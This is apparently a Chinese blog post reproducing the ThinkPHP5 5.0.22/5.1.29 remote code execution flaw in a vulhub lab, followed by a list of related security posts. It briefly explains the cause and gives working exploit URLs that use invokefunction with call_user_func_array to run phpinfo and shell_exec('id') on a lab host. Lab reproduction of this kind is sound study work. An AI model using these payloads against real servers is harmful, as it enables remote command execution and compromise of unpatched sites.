vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
D-river3 小时前
【Academy】HTTP 请求走私 ------ HTTP request smuggling
网络·网络协议·安全·web安全·http·网络安全
黑客笔记4 小时前
读书报告」网络安全防御实战--蓝军武器库
测试工具·web安全·网络安全
小园子的小菜7 小时前
探秘 Netty 通信中的 SslHandler 类:保障网络通信安全的基石
java·安全·web安全·netty
黑客笔记13 小时前
第11章 web应用程序安全(网络安全防御实战--蓝军武器库)
web安全·网络安全·wireshark
黑客Jack14 小时前
属于网络安全规划重安全性需求
安全·web安全·php
Codingwiz_Joy19 小时前
Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器
android·安全·web安全·安全性测试
网络安全Ash1 天前
2025网络安全漏洞
安全·web安全
黑客KKKing1 天前
Refreshtoken 前端 安全 前端安全方面
大数据·前端·网络·安全·web安全
Hacker_Fuchen1 天前
网络安全配置截图 网络安全i
网络·安全·web安全
远川_Horizon1 天前
Lab17_ Blind SQL injection with out-of-band data exfiltration
sql·web安全